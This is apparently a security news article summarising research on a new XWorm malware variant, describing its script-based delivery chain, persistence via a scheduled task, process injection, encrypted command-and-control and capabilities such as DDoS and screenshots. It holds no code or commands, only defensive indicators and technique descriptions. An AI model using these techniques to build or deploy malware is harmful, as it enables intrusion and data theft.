XWorm represents a sophisticated strain of malware that has garnered attention for its advanced obfuscation techniques and its potential to disrupt systems significantly. Known for its stealthy nature, XWorm poses a formidable challenge in the realm of cybersecurity.
Recently, researchers from NetSkope have unveiled a new variant of XWorm, which is now being delivered through Windows script files. This versatile malware, first identified in 2022, has progressed to version 5.6, showcasing its adaptability in the ever-evolving landscape of cyber threats.
XWorm Delivered Via Windows Script
This .NET-based threat initiates its infection chain with a Windows Script File (WSF), which subsequently downloads and executes an obfuscated PowerShell script from a site known as paste[.]ee. The script generates several files, including “VsLabs.vbs,” “VsEnhance.bat,” and “VsLabsData.ps1,” stored in the directory C:ProgramDataMusicVisuals. To maintain persistence, it creates a scheduled task named “MicroSoftVisualsUpdater.”
In addition to its initial infection methods, XWorm employs various evasive techniques, such as reflective code loading of a DLL loader (NewPE2) and process injection into legitimate processes like RegSvcs.exe. Communication with its command and control (C2) server occurs through TCP sockets, utilizing AES-ECB encryption and a modified MD5 hash as the key.
The latest features introduced in version 5.6 include the capability to remove plugins and a “Pong” command designed for response time reporting. This evolution underscores the malware’s increasing sophistication.
XWorm is adept at conducting extensive reconnaissance on infected systems, gathering information about hardware, software, and user privileges. Upon successful infection, it even alerts attackers via Telegram, facilitating real-time communication.
The malware’s intricate techniques allow it to access sensitive information, establish remote access, and deploy additional malware while remaining undetected. XWorm utilizes multiple attack vectors and can modify host files on compromised systems to redirect DNS requests for malicious purposes.
Moreover, XWorm is capable of launching Distributed Denial of Service (DDoS) attacks by sending repetitive POST requests to targeted IP addresses and ports. It can capture screenshots using the CopyFromScreen function, storing them as JPEG images in memory before transmission.
The malware executes a wide array of commands, including system manipulation (shutdown, restart, logoff), file operations, and remote code execution through PowerShell. It can also download and execute additional payloads, send HTTP requests, and persistently install plugins.
Communication with the C2 server is structured using a well-defined message format, often incorporating the victim’s system information. Another notable feature is process monitoring, which allows certain operations to be conducted discreetly, hiding activities from the user.
This diverse toolkit empowers cyber actors with extensive access and control over compromised systems, solidifying XWorm’s status as a significant threat in today’s cybersecurity ecosystem.
For those looking to bolster their defenses, a free webinar on protecting small businesses against advanced cyber threats is available for registration.